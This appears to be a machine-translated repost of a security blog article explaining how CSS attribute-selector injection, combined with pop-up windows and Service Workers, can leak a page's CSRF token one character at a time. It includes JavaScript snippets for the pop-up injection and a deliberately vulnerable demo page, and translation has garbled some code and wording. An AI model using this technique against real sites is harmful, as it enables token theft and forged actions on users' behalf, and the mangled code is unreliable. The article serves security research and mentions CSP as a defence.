Shulou(Shulou.com)06/01 Report--

This article mainly explains "how to use CSS injection to steal CSRF tokens". The content in the article is simple and clear, and it is easy to learn and understand. Please follow the editor's train of thought to study and learn "how to steal CSRF tokens using CSS injection".

CSS is no stranger to you. In Baidu Encyclopedia, it is interpreted as a computer language used to represent file styles such as HTML (an application of the standard general markup language) or XML (a subset of the standard general markup language). So, is it just a language used to express styles? Of course not! In fact, CSS has been used in penetration testing by security researchers as early as a few years ago. Here is an article that details a way to steal sensitive data using property selectors and iFrame and through CSS injection. However, because this method requires iFrame, and most mainstream sites do not allow this operation, this attack method is not practical.

Here I will give you a detailed introduction to a method that does not require iframe and can effectively steal CSRF token for us in only 10 seconds.

Once the user's CSRF token is stolen, the attacker can continue to attack and complete the CSRF attack on the user because the victim is already on the attacker's website.

Background

As described in the original article, CSS attribute selector developers can select elements based on the value of the attribute tag to match the substring. These property value selectors can do the following:

If the string begins with a substring, it matches

If the string ends with a substring, it matches

If the string contains substrings anywhere, it matches

The property selector allows developers to query page HTML tags for individual attributes and match their values. A practical use case is to change all href attributes that start with "https://example.com"" to a specific color.

In the real world, some sensitive information will be stored in the HTML tag. In most cases, the CSRF token is stored in this way: hidden in the property values of the form.

This allows us to match the CSS selector to the attribute in the form and load an external resource, such as a background image, to guess the starting letter of the attribute based on whether the form matches the starting string.

In this way, the attacker can guess verbatim and finally get the complete sensitive value.

Victims who want to solve this problem can implement content security policies (CSP) on their servers to prevent attackers from loading CSS code from outside.

No iFrames

To achieve no iFrame, I will use a method similar to the one I discussed earlier: I will create a pop-up window and then change the position of the pop-up window after setting the timer.

Using this method, I can still load the victim's CSS, but I no longer rely on whether the victim allows iFrame. Because the initial pop-up was triggered by a user event, I was not blocked by the browser.

To force overloading, I pop up a virtual window between CSS injections, as follows:

Var win2 = window.open ('https://security.love/anything',' fags, "top=100000,left=100000,menubar=1,resizable=1,width=1,height=1") var win2 = window.open (`https://security.love/cssInjection/victim.html?injection=${css}`, 'fags, "top=100000,left=100000,menubar=1,resizable=1,width=1,height=1") has no backend server

Transferring data to a back-end server is described in CureSec's article, but because CSRF is an attack on the client, if we can come up with a way that doesn't need a server, it can save us a lot of overhead and simplify our operations.

To receive the victim client loading resources, we can use Service Workers to intercept and read the request data. Service Workers currently applies only to requests of the same origin, and in my demo the victim and attacker pages are already on the same source.

Soon, however, chrome will likely incorporate this experimental feature, allowing Service Workers to intercept cross-domain requests.

In this way, we can ensure that 100% of our attacks on the client are executed, and force the user to click on the link to execute the CSRF attack within 10 seconds, as demonstrated below:

Demo

As mentioned above, because I don't want to run a web server, I use service workers to intercept and impersonate server-side components. Currently, this demo is only available for Chrome browsers.

First, I created a vulnerable target with a DOM-based CSS injection vulnerability and placed a sensitive token on the page. I also added some protection to the script tags, coding the left and right angle brackets.

Var fragment = decodeURIComponent_ (window.location.href.split ("? injection=") [1]); var htmlEncode = fragment.replace (/ / g, "& ampgt;"); [xss_clean] ("" + htmlEncode + "")

Next, we will force the victim's CSS to be loaded, and using the above method, we can steal (guess) one sensitive character at a time.

On the receiving side, I have defined a service worker to intercept requests and send them back to the domain through post-message, and then we store the token in local storage for later use. You can also imagine a back-end Web server that sends CSRF token back to the attacker's domain via Web sockets or polling.

Currently, this test only supports CHROME:

Demo

If your browser supports it, just click to open anywhere on the page and you will see that CSRF token will be guessed one by one.

Conclusion

Interestingly, reflective CSS injection is actually more lethal than storage CSS injection, because storage CSS injection requires a server to update the CSS before the victim renders.

For some time, CSS injection has changed back and forth in severity. IE browsers used to allow users to execute Javascript code in CSS. This demo also shows to some extent that CSS injection and rendering untrusted CSS on your domain can still cause serious security problems.

Thank you for your reading, the above is the content of "how to use CSS injection to steal CSRF tokens". After the study of this article, I believe you have a deeper understanding of how to use CSS injection to steal CSRF tokens, and the specific use needs to be verified in practice. Here is, the editor will push for you more related knowledge points of the article, welcome to follow!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.